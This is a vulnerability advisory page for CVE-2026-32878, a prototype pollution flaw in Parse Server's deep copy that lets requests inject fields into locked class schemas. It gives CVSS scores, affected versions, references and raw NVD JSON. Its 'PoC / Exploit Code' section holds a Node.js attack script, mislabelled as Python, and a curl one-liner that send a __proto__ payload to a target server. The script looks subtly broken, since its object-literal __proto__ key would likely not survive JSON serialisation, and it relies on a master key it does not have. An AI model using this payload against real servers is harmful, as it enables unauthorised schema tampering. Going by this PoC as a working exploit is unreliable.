CVE-2026-32878

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.20 and 8.6.44, an attacker can bypass the default request keyword denylist protection and the class-level permission for adding fields by sending a crafted request that exploits prototype pollution in the deep copy mechanism. This allows injecting fields into class schemas that have field addition locked down, and can cause permanent schema type conflicts that cannot be resolved even with the master key. In 9.6.0-alpha.20 and 8.6.44, the vulnerable third-party deep copy library has been replaced with a built-in deep clone mechanism that handles prototype properties safely, allowing the existing denylist check to correctly detect and reject the prohibited keyword. No known workarounds are available.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha1:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha10:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha11:*:*:*:node.js:*:* - VULNERABLE

Parse Server < 8.6.44

Parse Server 9.0.0 - 9.6.0-alpha.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-32878 PoC - Prototype Pollution in Parse Server Deep Copy
// This PoC demonstrates bypassing class-level field addition restrictions

const axios = require('axios');

// Target Parse Server instance
const TARGET_URL = 'http://target-server:1337/parse';
const APP_ID = 'your-app-id';
const API_KEY = 'your-api-key';

async function exploitPrototypePollution() {
    console.log('[+] Starting CVE-2026-32878 exploitation...');
    
    // Step 1: Create a class with locked field addition
    // In real scenario, this class would already exist with restricted permissions
    
    // Step 2: Send malicious request with __proto__ property
    // This exploits the deep copy mechanism to inject fields
    const maliciousPayload = {
        '__proto__': {
            'injectedField': {
                type: 'String',
                __isInjected: true
            }
        },
        'legitimateField': 'normalValue'
    };
    
    try {
        const response = await axios.post(
            `${TARGET_URL}/classes/VulnerableClass`,
            maliciousPayload,
            {
                headers: {
                    'X-Parse-Application-Id': APP_ID,
                    'X-Parse-REST-API-Key': API_KEY,
                    'Content-Type': 'application/json'
                }
            }
        );
        
        console.log('[+] Malicious request sent');
        console.log('[+] Response:', JSON.stringify(response.data, null, 2));
        
        // Step 3: Verify field injection by querying schema
        const schemaResponse = await axios.get(
            `${TARGET_URL}/schemas/VulnerableClass`,
            {
                headers: {
                    'X-Parse-Application-Id': APP_ID,
                    'X-Parse-Master-Key': 'master-key'  // Would need master key to verify
                }
            }
        );
        
        console.log('[+] Schema after exploitation:', JSON.stringify(schemaResponse.data, null, 2));
        
        // Check if injected field persists
        if (schemaResponse.data.fields && schemaResponse.data.fields.injectedField) {
            console.log('[!] SUCCESS: Field injection confirmed!');
            console.log('[!] The injected field persists even with master key');
        }
        
    } catch (error) {
        console.error('[-] Error during exploitation:', error.message);
    }
}

exploitPrototypePollution();

// Alternative PoC using curl:
// curl -X POST http://target-server:1337/parse/classes/TargetClass \
//   -H "X-Parse-Application-Id: APP_ID" \
//   -H "X-Parse-REST-API-Key: API_KEY" \
//   -H "Content-Type: application/json" \
//   -d '{"__proto__": {"evilField": {"type": "String"}}, "normalField": "value"}'

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32878
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32878
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32878/
[4] VulDB https://vuldb.com/cve/CVE-2026-32878
[5] https://github.com/parse-community/parse-server/pull/10200
[6] https://github.com/parse-community/parse-server/pull/10201
[7] https://github.com/parse-community/parse-server/security/advisories/GHSA-9ccr-fpp6-78qf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32878", "sourceIdentifier": "[email protected]", "published": "2026-03-18T22:16:25.510", "lastModified": "2026-03-19T17:28:32.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.20 and 8.6.44, an attacker can bypass the default request keyword denylist protection and the class-level permission for adding fields by sending a crafted request that exploits prototype pollution in the deep copy mechanism. This allows injecting fields into class schemas that have field addition locked down, and can cause permanent schema type conflicts that cannot be resolved even with the master key. In 9.6.0-alpha.20 and 8.6.44, the vulnerable third-party deep copy library has been replaced with a built-in deep clone mechanism that handles prototype properties safely, allowing the existing denylist check to correctly detect and reject the prohibited keyword. No known workarounds are available."}, {"lang": "es", "value": "Parse Server es un backend de código abierto que puede ser desplegado en cualquier infraestructura que pueda ejecutar Node.js. Antes de 9.6.0-alpha.20 y 8.6.44, un atacante puede eludir la protección predeterminada de la lista de denegación de palabras clave de solicitud y el permiso a nivel de clase para añadir campos enviando una solicitud manipulada que explota la contaminación de prototipos en el mecanismo de copia profunda. Esto permite inyectar campos en esquemas de clase que tienen la adición de campos bloqueada, y puede causar conflictos permanentes de tipo de esquema que no pueden resolverse ni siquiera con la clave maestra. En 9.6.0-alpha.20 y 8.6.44, la biblioteca vulnerable de copia profunda de terceros ha sido reemplazada por un mecanismo de clonación profunda incorporado que maneja las propiedades de prototipo de forma segura, permitiendo que la comprobación de la lista de denegación existente detecte y rechace correctamente la palabra clave prohibida. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "8.6.44", "matchCriteriaId": "52AB0794-6396-4E3D-BBB7-CDA9490B6CB9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.6.0", "matchCriteriaId": "1BAC01F8-0899-482C-8D91-64671BF2859A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "BBED261F-CA1B-44BC-9C3A-37378590EFEE"}, {"vulnerable": true, ... (truncated)